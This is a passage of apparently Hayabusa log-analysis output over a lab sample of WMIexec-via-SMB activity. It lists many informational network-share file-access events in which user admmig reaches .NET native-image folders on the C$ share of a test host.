Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#\b8d89e2f35d492e69789bd504270dff4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#\2af2b08e949ae5ebe946684d477a50d5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#\e75ae269d8eb8c8fb7bdcce4082ff8c2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#\64d113caa8b81caec5c21797931b5624 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\10483ca149b5c651d217edbf2f3169b4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting\e9062794b3050c9564584baa07300c10 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\77bc1a994f64193efc124c297b93fdb7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#\1e30da61ac8d97f7b17cdce57fb6a874 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\6f7a4225a199ad7894379512ca6ae50c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler\313baced763e9e5054e7694d5594cde5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Temp : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#\a1f231be2afa2e51dfc0a1f76644d2f7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient\abccca8c6f96e1d3c686a69acb31b9a9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider\c926f90d88838d450951cd6c5b41c961 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\3be4139a741b447ab35a2c788a2f4559 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#\d081d0c6a64c64fa9afe4e545f2eaa05 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\9bbf715cfb5360c95acd27b199083854 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#\f002202a6660cc8ce07f8ae19d6fac84 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\30fd20e8b16392d487e0f52dfd8a5900 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask\72aa615c9ea48820d317a6bed7b07213 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask\b1861416b236727b9d51d4568d9f6841 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\fabe62e146147faa9fc09e8b9a63d5cc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\9fe5c370593d72077c6ebc935bdccaf8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc\5965cfde76afc1f5c5d70d32fe0c7270 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy\9efa8cc0254efc497ae439914bbe9207 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx\8feba1d1646b72a4bc348315fa7bad6b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\44570ea6e616aa8a35b0768a4336f69d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\a5132d26ad1468bf7b6b89725e4cefce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc\a086b75bb1e8ee361af6ed079a6b77b4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown\870a6acacd5e95c0ffca82696cdb1d38 : IP Address: 